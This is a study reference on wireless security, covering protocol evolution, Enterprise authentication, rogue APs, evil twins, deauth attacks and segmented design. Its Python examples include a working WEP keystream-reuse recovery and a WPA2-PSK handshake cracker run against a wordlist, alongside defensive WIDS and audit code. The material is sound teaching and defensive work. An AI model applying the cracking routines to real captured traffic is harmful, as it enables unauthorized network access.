Key Takeaways: Wireless Security

A one-page reference. Reread before an exam or before moving on. Dense by design.

The one idea

Wireless removes the cable's physical access control — the network leaves the building. Assume the medium is observed and writable by an unauthenticated attacker. Therefore: encrypt everything, authenticate strongly, segment ruthlessly. Segmentation is the keystone — it makes wireless compromise survivable when every other control fails.

WiFi protocol evolution (memorize this table)

Protocol | Year | Cipher | Personal handshake | Verdict / on-sight rule
WEP | 1997 | RC4 + 24-bit IV | static key | BROKEN — key recovered from traffic in minutes; passphrase length irrelevant. Critical finding; remove.
WPA | 2003 | RC4 + TKIP | PSK (4-way) | DEPRECATED — stopgap on a weak cipher. Treat as near-WEP. Finding.
WPA2 | 2004 | AES-CCMP | PSK (4-way) | OK if patched — AES is sound; PSK is offline-guessable, so passphrase strength is everything.
WPA3 | 2018 | AES-CCMP (GCMP-256 in Enterprise 192-bit mode) | SAE (Dragonfly) | PREFERRED — resists offline guessing; forward secrecy; Enhanced Open (OWE) for open networks; mandates PMF.

Decision rule: WPA3 if you can → WPA2-AES with a long random passphrase if you must → never WPA/WEP.

  • WEP dies of IV reuse: the 24-bit IV repeats within a few thousand frames, two frames under one IV share an RC4 keystream, and statistical attacks on weak IVs (FMS/PTW) recover the key itself. Not a passphrase problem; cannot be fixed by a longer key.
  • WPA2-Personal dies of offline guessing: capture the 4-way handshake (passively, or force it with a deauth; a PMKID from the AP's first handshake message needs no legitimate client at all) → guess passphrase offline → security ≈ passphrase strength + secrecy.
  • WPA3-Personal (SAE) fix: a captured exchange can't be brute-forced offline; each guess needs a live, rate-limited, detectable exchange with the AP. Adds forward secrecy.
  • KRACK (2017, WPA2 key reinstallation) and Dragonblood (2019, WPA3 SAE side channels and downgrade) were closed by patches, not by a new protocol generation → patch wireless infrastructure and clients.
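The WEP bullet above, worked through in code. This is an added illustration, not code from the page or from any WEP tool: RC4 and the WEP key layout (IV || secret) are the real ones, while SECRET, IV and the two frame bodies are constructed sample data. It shows only the keystream-reuse consequence of a repeated IV plus the birthday bound that makes repeats inevitable; the full key-recovery attacks (FMS/PTW) go further and are not shown.

```python
"""WEP's break is IV reuse, not key length: two frames encrypted under the
same 24-bit IV share an RC4 keystream, so one known plaintext unmasks the
other without ever touching the key.

Added illustration, not code from the page. RC4 and the WEP key layout
(IV || secret) are the real ones; SECRET, IV and the two frame bodies are
constructed sample data.
"""
from math import log, sqrt


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4 (KSA then PRGA). WEP feeds it key = IV(3 bytes) || secret."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < n:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: the IV travels in the clear, followed by
    plaintext XOR RC4(IV || secret). (The ICV is omitted for brevity.)"""
    return iv + xor(plaintext, rc4_keystream(iv + secret, len(plaintext)))


def recover_with_known_plaintext(frame_known: bytes, known_pt: bytes,
                                 frame_target: bytes) -> bytes:
    """If two frames share an IV then c1 XOR c2 == p1 XOR p2. Knowing p1
    (LLC/SNAP, ARP and DHCP headers are predictable) yields the keystream
    and therefore p2, with zero knowledge of the secret key."""
    iv1, c1 = frame_known[:3], frame_known[3:]
    iv2, c2 = frame_target[:3], frame_target[3:]
    if iv1 != iv2:
        raise ValueError("frames must share an IV for keystream reuse")
    keystream = xor(c1, known_pt)            # c1 XOR p1 = keystream for this IV
    return xor(c2, keystream)                # recovers p2 up to len(known_pt)


def frames_until_iv_collision(p: float = 0.5, iv_bits: int = 24) -> int:
    """Birthday bound: frames sent before some IV repeats with probability p.
    For 24-bit IVs the 50% point is under 5,000 frames: seconds of traffic."""
    n = 2 ** iv_bits
    return int(sqrt(2 * n * log(1 / (1 - p)))) + 1


# Constructed sample data. SECRET is 13 bytes (WEP-104): the longer key
# changes nothing below, because the IV, not the key, decides keystream reuse.
SECRET = bytes.fromhex("0123456789abcdef0123456789")
IV = b"\x00\x00\x2a"                      # the same IV, reused on two frames
KNOWN_PT = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"ARP who-has 10.0.0.1"
SECRET_PT = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"GET /login?pw=1"


def demo() -> bytes:
    """Attacker sees two frames under IV 00002a and one predictable payload."""
    f_known = wep_encrypt(SECRET, IV, KNOWN_PT)
    f_target = wep_encrypt(SECRET, IV, SECRET_PT)
    return recover_with_known_plaintext(f_known, KNOWN_PT, f_target)


if __name__ == "__main__":
    print("recovered:", demo())
    print("frames to 50% IV collision:", frames_until_iv_collision())
```

Swap SECRET for a 5-byte (WEP-40) key and the result is identical: the secret never enters the recovery, which is the exam point behind "passphrase length irrelevant".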

PSK vs. Enterprise (the scale decision)

 | WPA2/3-Personal (PSK) | WPA-Enterprise (802.1X/EAP)
Secret | one shared passphrase | per-user credential (password or certificate)
Revoke one user | re-key everyone (so it never happens) | disable in directory once
Who connected? | unknown (one identity) | logged per user
Leak risk | sticky-note / shouted to customers | none shared to leak
VLAN assignment | static | per-user at connect time (via RADIUS)
Use for | homes, tiny sites | anything that matters
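The WPA2-Personal bullet (capture the 4-way handshake, guess offline) and the "one shared passphrase" row above, worked through in code. This is an added example, not code from the page or from any cracking tool: the derivations are the 802.11i ones (PBKDF2-HMAC-SHA1 x4096 gives the PMK, PRF-384 gives the PTK, HMAC-SHA1 over the EAPOL frame gives the MIC), while the SSID, MAC addresses, nonces, EAPOL body and wordlist are constructed sample data. The `ieee_vector_ok` check compares the PMK derivation against the published 802.11i Annex H test vector.

```python
"""WPA2-Personal offline guessing: a captured 4-way handshake contains
everything needed to test passphrase guesses at full speed, so the
network's security is exactly the passphrase's guessability.

Added example, not from the page. Derivations follow 802.11i; SSID, MACs,
nonces, the EAPOL body and the wordlist are constructed sample data.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, so precomputed tables are per-SSID: a default
    SSID makes the crack even cheaper."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (48 bytes for CCMP = KCK | KEK | TK) from the PMK plus the public
    handshake values: both MACs and both nonces, each ordered low-high."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (CCMP): HMAC-SHA1 over the EAPOL frame with
    its MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def build_eapol_m2(snonce: bytes, rsn_ie: bytes) -> bytes:
    """Handshake message 2 with the MIC field zeroed, as a cracker needs it:
    EAPOL header, then the EAPOL-Key descriptor fields in wire order."""
    body = (b"\x02"                                  # descriptor type: RSN
            + struct.pack(">H", 0x010A)              # key info: v2, pairwise, MIC set
            + struct.pack(">H", 16)                  # key length (CCMP TK)
            + struct.pack(">Q", 1)                   # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, ID
            + bytes(16)                              # MIC placeholder (zeroed)
            + struct.pack(">H", len(rsn_ie)) + rsn_ie)   # key data = RSN IE
    return b"\x01\x03" + struct.pack(">H", len(body)) + body   # EAPOL v1, type Key


# Constructed "capture": what a passive sniff or deauth-then-sniff yields.
SSID = "MeridianBranch"
AA = bytes.fromhex("0011223344aa")        # AP (authenticator) MAC
SPA = bytes.fromhex("0011223344bb")       # client (supplicant) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
RSN_IE_CCMP_PSK = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
EAPOL_M2 = build_eapol_m2(SNONCE, RSN_IE_CCMP_PSK)


def supplicant_mic(passphrase: str) -> bytes:
    """What the real client transmits: a MIC computed from the true PMK."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_M2)


def crack(captured_mic: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline, unthrottled, undetectable: repeat the derivation per guess and
    compare MICs. The network is never contacted again."""
    for candidate in wordlist:
        if hmac.compare_digest(supplicant_mic(candidate), captured_mic):
            return candidate
    return None


def ieee_vector_ok() -> bool:
    """Sanity check against the 802.11i Annex H vector ("password" / "IEEE")."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return pmk_from_passphrase("password", "IEEE").hex() == expected


WORDLIST = ["password", "meridian2024", "Welcome1", "branch-wifi", "Summer2023!"]

if __name__ == "__main__":
    print("vector ok:", ieee_vector_ok())
    print("cracked:", crack(supplicant_mic("branch-wifi"), WORDLIST))    # branch-wifi
    print("cracked:", crack(supplicant_mic("x7#Qm2!vL9pR"), WORDLIST))   # None
```

Nothing in `crack` touches the AP, which is why the "Detect" column for handshake capture reads "not detectable", and why the same handshake, shared by every client on a PSK network, cannot tell you which user it was.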

802.1X roles: supplicant (device) → authenticator (AP/switch = gatekeeper, blocks all traffic until OK) → authentication server (RADIUS + AD/Entra = makes the decision). EAP = an extensible container for auth methods; RADIUS carries it to the server.

EAP methods

Method | User presents | Server presents | Cost | Risk
EAP-TLS (gold) | client certificate | server certificate | needs PKI / a cert per device | nothing to phish — the credential is a private key on the device
PEAP / EAP-TTLS | password (inside a TLS tunnel) | server certificate | easy (uses the AD password) | an evil twin with its own server cert harvests the inner credential if server-cert validation is OFF: the MSCHAPv2 challenge/response (crackable offline) with PEAP, the cleartext password with TTLS/PAP

Rule: EAP-TLS where devices are managed; PEAP only with rigorously enforced, pinned server-cert validation (trusted CA plus expected server name, pushed by MDM/GPO so users cannot click through a warning). PEAP-with-validation-off = credential-harvesting trap (and the harvested AD credential works for email/VPN too).

Wireless attacks → detection → prevention

Attack | What it is | Detect (WIDS) | Prevent
Rogue AP | unauthorized AP on your network (a doorway inside) | unknown BSSID bridged to your wire → CRITICAL | jack hygiene (802.1X on switch ports); WIDS; disable unused ports
Evil twin | rogue AP impersonating your SSID to lure devices | your SSID from a BSSID not on the allowlist → HIGH | WPA3/EAP-TLS; BSSID monitoring
Deauth attack | forged, unauthenticated management frames that disconnect clients | spike in deauth frames (leading indicator) | 802.11w / PMF (mandatory in WPA3)
Handshake capture | grab the 4-way handshake for an offline crack | passive — not detectable | strong passphrase; better: abandon PSK
  • Rogue AP ≠ evil twin: rogue AP defined by network connection; evil twin defined by impersonation. Often combined.
  • Deauth is a lever, not the goal: forces reconnect → enables handshake capture + evil-twin luring. PMF kills it.
  • You can't stop transmission in a parking lot → detect fast (WIDS) + contain (segment).
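The three detectable rows of the table, as WIDS rules run over a constructed frame log. This is an added example, not the page's code or any WIDS product's: the SSID list, BSSID allowlist, wired MAC table and frame records are constructed, and the base-MAC heuristic for "bridged to your wire" (APs derive per-SSID BSSIDs from one base address by varying the low nibble, so a BSSID whose base MAC appears in the switch table is on the wire) is an assumption that real products implement with vendor-specific rules.

```python
"""WIDS rules for the detectable wireless attacks: evil twin (our SSID from
an unknown BSSID), rogue AP (unknown BSSID bridged to the wire) and deauth
flood (burst of deauth/disassoc frames: the leading indicator that a
handshake capture or evil-twin lure is under way).

Added example, not from the page. Allowlist, wired MAC table and frames
are constructed; the base-MAC heuristic is an assumption.
"""
from collections import deque
from typing import List, Tuple

OUR_SSIDS = {"Meridian-Staff", "Meridian-Guest"}
ALLOWED_BSSIDS = {"aa:bb:cc:00:01:10", "aa:bb:cc:00:01:91"}   # AP inventory
WIRED_MACS = {"aa:bb:cc:00:01:00",    # our AP's wired side (constructed switch table)
              "de:ad:be:ef:00:10",    # unknown device seen on a branch port
              "00:50:56:11:22:33"}    # a server

Frame = Tuple[float, str, str, str]   # (timestamp, subtype, bssid, ssid or "")
Alert = Tuple[str, str, str]          # (severity, rule, detail)


def base_mac(mac: str) -> str:
    """Mask the low nibble: 'de:ad:be:ef:00:1f' -> 'de:ad:be:ef:00:10'."""
    parts = mac.split(":")
    parts[-1] = f"{int(parts[-1], 16) & 0xF0:02x}"
    return ":".join(parts)


def detect(frames: List[Frame], window_s: float = 10.0, deauth_threshold: int = 20) -> List[Alert]:
    alerts: List[Alert] = []
    seen = set()            # one alert per (rule, bssid)
    recent = deque()        # timestamps of deauth/disassoc frames inside the window
    flood_open = False
    for ts, subtype, bssid, ssid in sorted(frames, key=lambda f: f[0]):
        if subtype in ("beacon", "probe_resp"):
            if ssid in OUR_SSIDS and bssid not in ALLOWED_BSSIDS and ("evil-twin", bssid) not in seen:
                alerts.append(("HIGH", "evil-twin", f"{ssid} advertised by unknown BSSID {bssid}"))
                seen.add(("evil-twin", bssid))
            if bssid not in ALLOWED_BSSIDS and base_mac(bssid) in WIRED_MACS and ("rogue-ap", bssid) not in seen:
                alerts.append(("CRITICAL", "rogue-ap",
                               f"unknown BSSID {bssid} bridged to the wire (base MAC {base_mac(bssid)} in switch table)"))
                seen.add(("rogue-ap", bssid))
        elif subtype in ("deauth", "disassoc"):
            recent.append(ts)
            while recent and ts - recent[0] > window_s:
                recent.popleft()
            if len(recent) >= deauth_threshold and not flood_open:
                alerts.append(("HIGH", "deauth-flood",
                               f"{len(recent)} deauth/disassoc frames within {window_s:g}s from {bssid} (t={ts:.2f})"))
                flood_open = True
            elif len(recent) < deauth_threshold:
                flood_open = False   # burst ended; a new burst alerts again
    return alerts


def sample_frames() -> List[Frame]:
    """Constructed capture: normal beacons, one evil twin, one rogue AP,
    then a 40-frame deauth burst from the evil twin against our clients."""
    frames: List[Frame] = []
    for i in range(30):                                   # legitimate beacons, 0.1 s apart
        frames.append((i * 0.1, "beacon", "aa:bb:cc:00:01:10", "Meridian-Staff"))
        frames.append((i * 0.1 + 0.05, "beacon", "aa:bb:cc:00:01:91", "Meridian-Guest"))
    frames.append((1.23, "beacon", "66:77:88:99:00:01", "Meridian-Staff"))    # evil twin
    frames.append((1.87, "beacon", "de:ad:be:ef:00:1f", "FreeWifi-Setup"))    # rogue, on the wire
    for i in range(40):                                   # deauth flood, 50 ms apart
        frames.append((2.0 + i * 0.05, "deauth", "66:77:88:99:00:01", ""))
    return frames


if __name__ == "__main__":
    for sev, rule, detail in detect(sample_frames()):
        print(f"[{sev}] {rule}: {detail}")
```

With PMF enforced the deauth burst no longer disconnects anyone, but the rule still fires: the flood is evidence that someone in range is setting up the next step, and that is worth a ticket even when the lever no longer works.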

Bluetooth & NFC (proportionate, not panic)

 | Range | Real risk | Controls
Bluetooth | ~10 m nominal (farther with a directional antenna) | BlueBorne-class bugs compromise unpaired devices in range; weak/forgotten peripherals (keyboards, card readers) | patch; disable when unused; not discoverable; inventory; modern ("Secure Connections") pairing
NFC | ~cm | contactless payments use one-time cryptograms (skimming yields little); legacy access badges clonable | keep terminals current/tamper-evident; modern cryptographic badges

Meridian branch wireless design (the §8.6 architecture)

Staff  → WPA3-Enterprise (802.1X/EAP-TLS) → VLAN 10 → internal apps (least priv)
Guest  → WPA3 Enhanced Open + captive portal + client isolation → VLAN 90 → INTERNET ONLY, deny all internal
Ops/IoT→ WPA3-Personal (strong unique PSK) → VLAN 50 → deny internet, deny staff/guest
+ 802.11w/PMF everywhere · WIDS across branches · DEFAULT-DENY between all segments
  • The firewall rules between segments are the security; SSIDs/VLANs are just labels. DENY guest → staff is the line that protects the tellers.
  • Audit enforcement, not configuration — the dangerous window is when VLAN is changed but the firewall rule isn't.

Certification crosswalk

Concept | CompTIA Security+ (SY0-701) | (ISC)² CISSP domain
WEP/WPA/WPA2/WPA3, ciphers | 1.0 / 3.0 / 4.0 (secure protocols & wireless) | Communication & Network Security
PSK vs. Enterprise, 802.1X, EAP, RADIUS | 1.0; 4.0 Security Operations | Identity & Access Mgmt; Communication & Network Security
Evil twin, rogue AP, deauth, jamming | 2.0 Threats, Vulnerabilities & Mitigations | Security Operations; Communication & Network Security
WIDS / wireless monitoring | 4.0 Security Operations | Security Operations
Bluetooth / NFC exposure | 2.0; 3.0 | Communication & Network Security
Segmentation as a wireless control | 3.0 Security Architecture | Security Architecture & Engineering

Project additions this chapter

  • Meridian program: the wireless policy (protocols permitted/prohibited; staff = WPA-Enterprise/EAP-TLS; guest isolated; IoT segmented; PMF required; WIDS required; rogue APs prohibited) — joins the Ch.6–7 network architecture.
  • bluekit toolkit: wifiaudit.py, assess_wifi(cfg) grades one wireless config against the policy (weak protocol, short PSK, staff-not-Enterprise, EAP-without-cert-validation, guest-not-isolated, PMF-off).
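The §8.6 design and the wifiaudit.py checks, audited on both levels the page insists on: grade each SSID's configuration against the policy, then separately check that the inter-segment firewall enforces the intended deny lines (L67-68: the rules are the security, the labels are not). This is an added example and not bluekit's code; `assess_wifi()` only mirrors the `assess_wifi(cfg)` signature the page describes. The config dicts, the rule base, the 16-character PSK minimum and the zone names are constructed assumptions.

```python
"""Audit wireless configuration against policy, then audit firewall
enforcement against the intended segmentation matrix.

Added example, not bluekit's code: assess_wifi() only mirrors the signature
the page describes. Config dicts, rule base, the 16-char PSK minimum and the
zone names are constructed assumptions.
"""
from typing import Dict, List, Tuple

Finding = Tuple[str, str]        # (severity, message)


def assess_wifi(cfg: Dict) -> List[Finding]:
    """Grade one SSID config. Keys: name, role (staff|guest|iot), protocol and,
    as relevant, psk, eap, validate_server_cert, client_isolation,
    pmf (required|optional|disabled)."""
    f: List[Finding] = []
    name, proto, role = cfg["name"], cfg["protocol"], cfg["role"]
    if proto in ("WEP", "WPA"):
        f.append(("CRITICAL", f"{name}: {proto} is broken/deprecated; remove"))
    if proto.endswith("Personal") and len(cfg.get("psk", "")) < 16:
        f.append(("HIGH", f"{name}: PSK shorter than 16 chars is offline-guessable"))
    if role == "staff" and not proto.endswith("Enterprise"):
        f.append(("HIGH", f"{name}: staff SSID must be 802.1X/EAP-TLS, not PSK"))
    if proto.endswith("Enterprise"):
        if cfg.get("eap") in ("PEAP", "EAP-TTLS") and not cfg.get("validate_server_cert", False):
            f.append(("CRITICAL", f"{name}: {cfg['eap']} without server-cert validation = credential harvest"))
        elif cfg.get("eap") != "EAP-TLS":
            f.append(("LOW", f"{name}: policy prefers EAP-TLS for managed devices"))
    if role == "guest" and not cfg.get("client_isolation", False):
        f.append(("MEDIUM", f"{name}: guest SSID without client isolation"))
    if cfg.get("pmf") != "required":
        f.append(("MEDIUM", f"{name}: PMF not required; deauth attacks still work"))
    return f


# Intended segmentation matrix (src zone, dst zone) -> action. Pairs not
# listed fall under the default deny between segments.
INTENDED = {("staff", "internal"): "allow", ("staff", "internet"): "allow",
            ("guest", "internet"): "allow", ("guest", "internal"): "deny",
            ("guest", "staff"): "deny", ("guest", "iot"): "deny",
            ("iot", "internet"): "deny", ("iot", "staff"): "deny",
            ("iot", "guest"): "deny"}

Rule = Tuple[str, str, str]      # (src zone, dst zone, action); "*" = any


def effective_action(rules: List[Rule], src: str, dst: str) -> str:
    """First-match evaluation with an implicit default deny at the end."""
    for r_src, r_dst, action in rules:
        if r_src in (src, "*") and r_dst in (dst, "*"):
            return action
    return "deny"


def audit_segmentation(rules: List[Rule]) -> List[Finding]:
    """Compare what the rule base does with what the design intends:
    an unintended allow on a deny line is the dangerous window."""
    f: List[Finding] = []
    for (src, dst), wanted in INTENDED.items():
        got = effective_action(rules, src, dst)
        if got != wanted:
            sev = "CRITICAL" if wanted == "deny" else "MEDIUM"
            f.append((sev, f"{src} -> {dst}: intended {wanted}, rule base gives {got}"))
    return f


# Constructed sample inputs: three policy-compliant-looking SSIDs plus a
# legacy one, and a rule base with one "temporary" convenience allow.
SSIDS = [
    {"name": "Meridian-Staff", "role": "staff", "protocol": "WPA3-Enterprise",
     "eap": "EAP-TLS", "validate_server_cert": True, "pmf": "required"},
    {"name": "Meridian-Guest", "role": "guest", "protocol": "OWE",
     "client_isolation": False, "pmf": "required"},
    {"name": "Branch-IoT", "role": "iot", "protocol": "WPA2-Personal",
     "psk": "printers1", "pmf": "optional"},
    {"name": "Legacy-Staff", "role": "staff", "protocol": "WPA2-Enterprise",
     "eap": "PEAP", "validate_server_cert": False, "pmf": "required"},
]
RULES: List[Rule] = [
    ("guest", "staff", "allow"),          # added for a shared printer, never removed
    ("staff", "*", "allow"),
    ("guest", "internet", "allow"),
    ("*", "*", "deny"),
]

if __name__ == "__main__":
    for cfg in SSIDS:
        for sev, msg in assess_wifi(cfg):
            print(f"[{sev}] {msg}")
    for sev, msg in audit_segmentation(RULES):
        print(f"[{sev}] {msg}")
```

Run both audits on every change, not just the wireless one: in the sample rule base every SSID can pass the configuration check while the single guest → staff allow on line one silently removes the line that protects the tellers.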

Common pitfalls

  • Thinking a long WEP key helps (the break is in the protocol, not the passphrase).
  • Hiding the SSID as a "security control" (it is not a secret: it still appears in cleartext in probe and association frames; stops only casual users, breaks some clients).
  • Deploying PEAP and assuming it's safe without enforcing server-certificate validation.
  • Treating guest WiFi as harmless — it's safe only if genuinely isolated; one convenience allow-rule breaks it.
  • Calling a rogue AP harmless because it's not malicious (it's still an unauthenticated bridge inside).
  • Auditing the wireless config but not the firewall rules that actually enforce isolation.
  • Forgetting that wireless gear needs patching (KRACK, Dragonblood, BlueBorne).